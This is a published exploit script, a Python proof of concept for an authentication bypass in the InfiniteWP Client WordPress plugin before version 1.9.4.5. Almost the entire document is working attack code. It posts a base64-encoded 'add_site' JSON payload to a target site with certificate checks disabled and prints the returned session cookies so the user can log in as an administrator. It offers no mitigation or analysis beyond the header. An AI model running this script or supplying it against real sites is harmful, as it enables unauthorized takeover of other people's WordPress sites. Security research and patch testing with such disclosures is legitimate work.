WordPress Plugin InfiniteWP Client 1.9.4.5 – Authentication Bypass

# Exploit Title: WordPress Plugin InfiniteWP Client 1.9.4.5 – Authentication Bypass
# Date: 2020-1-16
# Exploit Author: Raphael Karger
# Vendor Homepage: https://infinitewp.com/
# Version: InfiniteWP Client < 1.9.4.5

#!/usr/bin/python3

import requests
import json
import argparse
import base64
import json
import urllib3
urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)

def exploit(site, username):
    json_info = {“iwp_action”:”add_site”,”params”:{“username”: username}}
    try:
        return requests.post(site, timeout=5, verify=False,
            headers={“User-Agent” : “raphaelrocks”},
            data=”_IWP_JSON_PREFIX_{}”.format(base64.b64encode(json.dumps(json_info).encode(“utf-8”)).decode(“utf-8”))
        )
    except Exception as e:
        print(“[-] HTTP Exploit Error: {}”.format(e))
    return False

if __name__ == “__main__”:
    parser = argparse.ArgumentParser()
    parser.add_argument(“-n”, “–username”, dest=”username”, help=”Username of admin, default is admin”, default=”admin”)
    parser.add_argument(“-u”, “–url”, dest=”url”, help=”Root URL of Site”)
    args = parser.parse_args()
    site_exploit = exploit(args.url, args.username)
    if site_exploit and site_exploit.status_code == requests.codes.ok:
        cookie_string = “; “.join([str(x)+”=”+str(y) for x,y in site_exploit.cookies.items()])
        if cookie_string:
            print(“[+] Use Cookies to Login: n{}”.format(cookie_string))
            exit(0)
    print(“[-] Exploit Failed”)